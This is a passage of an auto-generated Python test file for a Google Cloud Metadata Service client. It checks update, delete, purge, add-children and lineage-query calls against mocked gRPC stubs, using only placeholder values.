# Designate an appropriate return value for the call.
call.return_value = gca_context.Context()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.update_context(
context=gca_context.Context(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].context
mock_val = gca_context.Context(name="name_value")
assert arg == mock_val
arg = args[0].update_mask
mock_val = field_mask_pb2.FieldMask(paths=["paths_value"])
assert arg == mock_val
def test_update_context_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.update_context(
metadata_service.UpdateContextRequest(),
context=gca_context.Context(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
@pytest.mark.asyncio
async def test_update_context_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_context), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gca_context.Context()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gca_context.Context())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.update_context(
context=gca_context.Context(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].context
mock_val = gca_context.Context(name="name_value")
assert arg == mock_val
arg = args[0].update_mask
mock_val = field_mask_pb2.FieldMask(paths=["paths_value"])
assert arg == mock_val
@pytest.mark.asyncio
async def test_update_context_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.update_context(
metadata_service.UpdateContextRequest(),
context=gca_context.Context(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.DeleteContextRequest,
dict,
],
)
def test_delete_context(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_context), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/spam")
response = client.delete_context(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.DeleteContextRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_delete_context_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_context), "__call__") as call:
client.delete_context()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.DeleteContextRequest()
@pytest.mark.asyncio
async def test_delete_context_async(
transport: str = "grpc_asyncio", request_type=metadata_service.DeleteContextRequest
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_context), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
response = await client.delete_context(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.DeleteContextRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_delete_context_async_from_dict():
await test_delete_context_async(request_type=dict)
def test_delete_context_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.DeleteContextRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_context), "__call__") as call:
call.return_value = operations_pb2.Operation(name="operations/op")
client.delete_context(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_delete_context_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.DeleteContextRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_context), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/op")
)
await client.delete_context(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
def test_delete_context_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_context), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.delete_context(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_delete_context_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete_context(
metadata_service.DeleteContextRequest(),
name="name_value",
)
@pytest.mark.asyncio
async def test_delete_context_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_context), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.delete_context(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_delete_context_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.delete_context(
metadata_service.DeleteContextRequest(),
name="name_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.PurgeContextsRequest,
dict,
],
)
def test_purge_contexts(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_contexts), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/spam")
response = client.purge_contexts(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.PurgeContextsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_purge_contexts_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_contexts), "__call__") as call:
client.purge_contexts()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.PurgeContextsRequest()
@pytest.mark.asyncio
async def test_purge_contexts_async(
transport: str = "grpc_asyncio", request_type=metadata_service.PurgeContextsRequest
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_contexts), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
response = await client.purge_contexts(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.PurgeContextsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_purge_contexts_async_from_dict():
await test_purge_contexts_async(request_type=dict)
def test_purge_contexts_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.PurgeContextsRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_contexts), "__call__") as call:
call.return_value = operations_pb2.Operation(name="operations/op")
client.purge_contexts(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_purge_contexts_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.PurgeContextsRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_contexts), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/op")
)
await client.purge_contexts(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
def test_purge_contexts_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_contexts), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.purge_contexts(
parent="parent_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
def test_purge_contexts_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.purge_contexts(
metadata_service.PurgeContextsRequest(),
parent="parent_value",
)
@pytest.mark.asyncio
async def test_purge_contexts_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_contexts), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.purge_contexts(
parent="parent_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_purge_contexts_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.purge_contexts(
metadata_service.PurgeContextsRequest(),
parent="parent_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.AddContextArtifactsAndExecutionsRequest,
dict,
],
)
def test_add_context_artifacts_and_executions(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_context_artifacts_and_executions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.AddContextArtifactsAndExecutionsResponse()
response = client.add_context_artifacts_and_executions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.AddContextArtifactsAndExecutionsRequest()
# Establish that the response is the type that we expect.
assert isinstance(
response, metadata_service.AddContextArtifactsAndExecutionsResponse
)
def test_add_context_artifacts_and_executions_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_context_artifacts_and_executions), "__call__"
) as call:
client.add_context_artifacts_and_executions()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.AddContextArtifactsAndExecutionsRequest()
@pytest.mark.asyncio
async def test_add_context_artifacts_and_executions_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.AddContextArtifactsAndExecutionsRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_context_artifacts_and_executions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.AddContextArtifactsAndExecutionsResponse()
)
response = await client.add_context_artifacts_and_executions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.AddContextArtifactsAndExecutionsRequest()
# Establish that the response is the type that we expect.
assert isinstance(
response, metadata_service.AddContextArtifactsAndExecutionsResponse
)
@pytest.mark.asyncio
async def test_add_context_artifacts_and_executions_async_from_dict():
await test_add_context_artifacts_and_executions_async(request_type=dict)
def test_add_context_artifacts_and_executions_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.AddContextArtifactsAndExecutionsRequest()
request.context = "context_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_context_artifacts_and_executions), "__call__"
) as call:
call.return_value = metadata_service.AddContextArtifactsAndExecutionsResponse()
client.add_context_artifacts_and_executions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"context=context_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_add_context_artifacts_and_executions_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.AddContextArtifactsAndExecutionsRequest()
request.context = "context_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_context_artifacts_and_executions), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.AddContextArtifactsAndExecutionsResponse()
)
await client.add_context_artifacts_and_executions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"context=context_value",
) in kw["metadata"]
def test_add_context_artifacts_and_executions_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_context_artifacts_and_executions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.AddContextArtifactsAndExecutionsResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.add_context_artifacts_and_executions(
context="context_value",
artifacts=["artifacts_value"],
executions=["executions_value"],
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].context
mock_val = "context_value"
assert arg == mock_val
arg = args[0].artifacts
mock_val = ["artifacts_value"]
assert arg == mock_val
arg = args[0].executions
mock_val = ["executions_value"]
assert arg == mock_val
def test_add_context_artifacts_and_executions_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.add_context_artifacts_and_executions(
metadata_service.AddContextArtifactsAndExecutionsRequest(),
context="context_value",
artifacts=["artifacts_value"],
executions=["executions_value"],
)
@pytest.mark.asyncio
async def test_add_context_artifacts_and_executions_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_context_artifacts_and_executions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.AddContextArtifactsAndExecutionsResponse()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.AddContextArtifactsAndExecutionsResponse()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.add_context_artifacts_and_executions(
context="context_value",
artifacts=["artifacts_value"],
executions=["executions_value"],
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].context
mock_val = "context_value"
assert arg == mock_val
arg = args[0].artifacts
mock_val = ["artifacts_value"]
assert arg == mock_val
arg = args[0].executions
mock_val = ["executions_value"]
assert arg == mock_val
@pytest.mark.asyncio
async def test_add_context_artifacts_and_executions_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.add_context_artifacts_and_executions(
metadata_service.AddContextArtifactsAndExecutionsRequest(),
context="context_value",
artifacts=["artifacts_value"],
executions=["executions_value"],
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.AddContextChildrenRequest,
dict,
],
)
def test_add_context_children(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_context_children), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.AddContextChildrenResponse()
response = client.add_context_children(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.AddContextChildrenRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, metadata_service.AddContextChildrenResponse)
def test_add_context_children_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_context_children), "__call__"
) as call:
client.add_context_children()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.AddContextChildrenRequest()
@pytest.mark.asyncio
async def test_add_context_children_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.AddContextChildrenRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_context_children), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.AddContextChildrenResponse()
)
response = await client.add_context_children(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.AddContextChildrenRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, metadata_service.AddContextChildrenResponse)
@pytest.mark.asyncio
async def test_add_context_children_async_from_dict():
await test_add_context_children_async(request_type=dict)
def test_add_context_children_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.AddContextChildrenRequest()
request.context = "context_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_context_children), "__call__"
) as call:
call.return_value = metadata_service.AddContextChildrenResponse()
client.add_context_children(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"context=context_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_add_context_children_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.AddContextChildrenRequest()
request.context = "context_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_context_children), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.AddContextChildrenResponse()
)
await client.add_context_children(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"context=context_value",
) in kw["metadata"]
def test_add_context_children_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_context_children), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.AddContextChildrenResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.add_context_children(
context="context_value",
child_contexts=["child_contexts_value"],
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].context
mock_val = "context_value"
assert arg == mock_val
arg = args[0].child_contexts
mock_val = ["child_contexts_value"]
assert arg == mock_val
def test_add_context_children_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.add_context_children(
metadata_service.AddContextChildrenRequest(),
context="context_value",
child_contexts=["child_contexts_value"],
)
@pytest.mark.asyncio
async def test_add_context_children_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.add_context_children), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.AddContextChildrenResponse()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.AddContextChildrenResponse()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.add_context_children(
context="context_value",
child_contexts=["child_contexts_value"],
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].context
mock_val = "context_value"
assert arg == mock_val
arg = args[0].child_contexts
mock_val = ["child_contexts_value"]
assert arg == mock_val
@pytest.mark.asyncio
async def test_add_context_children_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.add_context_children(
metadata_service.AddContextChildrenRequest(),
context="context_value",
child_contexts=["child_contexts_value"],
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.QueryContextLineageSubgraphRequest,
dict,
],
)
def test_query_context_lineage_subgraph(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_context_lineage_subgraph), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = lineage_subgraph.LineageSubgraph()
response = client.query_context_lineage_subgraph(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.QueryContextLineageSubgraphRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, lineage_subgraph.LineageSubgraph)
def test_query_context_lineage_subgraph_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_context_lineage_subgraph), "__call__"
) as call:
client.query_context_lineage_subgraph()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.QueryContextLineageSubgraphRequest()
@pytest.mark.asyncio
async def test_query_context_lineage_subgraph_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.QueryContextLineageSubgraphRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_context_lineage_subgraph), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
lineage_subgraph.LineageSubgraph()
)
response = await client.query_context_lineage_subgraph(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.QueryContextLineageSubgraphRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, lineage_subgraph.LineageSubgraph)
@pytest.mark.asyncio
async def test_query_context_lineage_subgraph_async_from_dict():
await test_query_context_lineage_subgraph_async(request_type=dict)
def test_query_context_lineage_subgraph_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.QueryContextLineageSubgraphRequest()
request.context = "context_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_context_lineage_subgraph), "__call__"
) as call:
call.return_value = lineage_subgraph.LineageSubgraph()
client.query_context_lineage_subgraph(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"context=context_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_query_context_lineage_subgraph_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.QueryContextLineageSubgraphRequest()
request.context = "context_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_context_lineage_subgraph), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
lineage_subgraph.LineageSubgraph()
)
await client.query_context_lineage_subgraph(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"context=context_value",
) in kw["metadata"]
def test_query_context_lineage_subgraph_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
